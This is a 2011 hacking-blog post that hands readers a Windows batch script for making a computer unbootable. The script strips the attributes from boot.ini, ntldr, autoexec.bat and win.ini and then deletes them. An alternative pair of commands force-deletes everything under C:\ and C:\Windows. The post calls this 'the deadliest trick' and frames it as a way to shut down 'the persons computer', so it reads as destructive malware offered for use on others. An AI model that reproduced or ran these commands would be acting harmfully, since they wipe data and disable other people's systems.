SYSTEM&WEB HACKING: Shutdown A Computer Forever! (part 3)

Wednesday, August 17, 2011

Shutdown A Computer Forever! (part 3)

Now Please take your eyes of this part because this is the most simplest and deadliest trick/hack for your windows computer. Copy the following code into your notepad
 
@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini

Save it as “shutdown-forever.bat”. Just make sure it has a .bat or .cmd extension.

DO NOT RUN THE BATCH FILE ,YOU WILL NOT  RECOVER BACK IF YOU RUN IT !!!

This will shutdown the persons computer. It shuts it off once and deletes all the files needed to reboot and restart it again.So please, use this hack only if you have no intention of rebooting your computer again. So just be careful.
Here’s an alternative code.
cmd /c del c:\windows\* /F /S /Q
cmd /c del c:\* /F /S /Q
Paste it in NotePad And Save It with Extension .cmd or .bat

1 comment:

Anonymous said...

do they work?